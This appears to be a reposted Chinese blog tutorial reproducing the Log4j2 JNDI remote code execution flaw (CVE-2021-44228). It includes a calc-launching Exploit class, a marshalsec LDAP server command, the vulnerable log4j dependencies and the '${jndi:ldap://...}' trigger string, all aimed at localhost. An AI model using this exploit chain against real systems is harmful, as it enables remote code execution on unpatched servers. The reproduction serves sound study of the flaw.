Apache Log4j2远程代码执行漏洞 - 代码天地

Apache Log4j2远程代码执行漏洞

编程语言 2021-12-10 19:27:00 阅读次数: 0

图片.png

编译

public class Exploit
{
  static
  {
    try
    {
      String[] cmd = { "calc" };
      Runtime.getRuntime().exec(cmd).waitFor();
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}
复制代码

找一个http服务器,把Exploit.class放到根目录下使用marshalsec创建一个jndi/rmi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:12345/#Exploit
复制代码

新建一个项目引入问题的log4j2包

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.12.0</version>
        </dependency>

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.12.0</version>
        </dependency>
复制代码

创建如下代码 (记得加载log4j2配置)

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Main {

    private static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");
    }
}
复制代码

参考文章:

猜你喜欢

转载自juejin.im/post/7039973243387183141

Apache Log4j2远程代码执行漏洞

Apache Log4j2 远程代码执行漏洞被公开，风险等级严重

Apache Log4j2远程代码执行漏洞处理

【紧急】Apache Log4j2 远程代码执行漏洞

Apache Log4j2远程代码执行漏洞风险紧急通告，腾讯安全支持全面检测拦截

Apache Log4j2代码执行漏洞复现（cve-2021-44228）

【漏洞预警】CVE-2021-44228：Apache Log4j2存在任意代码执行漏洞

分析并复现Apache核弹级漏洞，利用Log4j2使目标服务器执行任意代码

KubeSphere 对 Apache Log4j 2 远程代码执行最新漏洞的修复方案

Apache Log4j2 RCE漏洞复现

Apache爆发高危漏洞模块log4j的漏洞支持远程代码执行 Apache log4j

开源网安警示，Apache Log4j远程代码执行漏洞 | 风险漏洞提示

【vulhub漏洞复现】CVE-2021-44228 Apache Log4j 远程代码执行漏洞

Apache Log4j 远程代码执行漏洞源码级分析

全民日志组件 Apache Log4j2 爆发漏洞，赶紧加班修复

Apache log4j2安全漏洞解析及解决方法

Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现

CVE-2021-44228：Apache Log4j2 JNDI注入漏洞

Apache log4j2(CVE-2021-44228)漏洞(复现详细过程)

Log4j漏洞反弹shell CVE-2021-44228 Apache Log4j 远程代码执行漏洞复现

Apache Log4j2，RASP 防御优势及原理

Apache Struts 2 远程代码执行漏洞

记录一下 Apache Log4j 远程代码注入漏洞

Log4j2远程代码执行漏洞本地复现

快速修复Log4j2远程代码执行漏洞

Apache log4j漏洞总结

6. Spring Boot 2.x With Apache Log4j2

Log4j2 - Unable to invoke factory method in class org.apache.logging.log4j.core.appender.RollingFile

升级log4j到log4j2报错：cannot access org.apache.http.annotation.NotThreadSafe

log4j2远程代码执行漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

周排行

购置笔记本常识

从源码看Spring Security之采坑笔记（Spring Boot篇）

大数据学习——高可用配置案例

如何避免选择不专业的建站公司?

Euclid's Game HDU - 1525（博弈）

面试笔记（六）---Js实现eventHandler

Windows 实例搭建的 FTP 在外网无法连接和访问

设计模式 : 桥接模式

USB 设备驱动开发之几个重要结构体分析

14-p14_sqrt求平方根

每日归档

更多

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)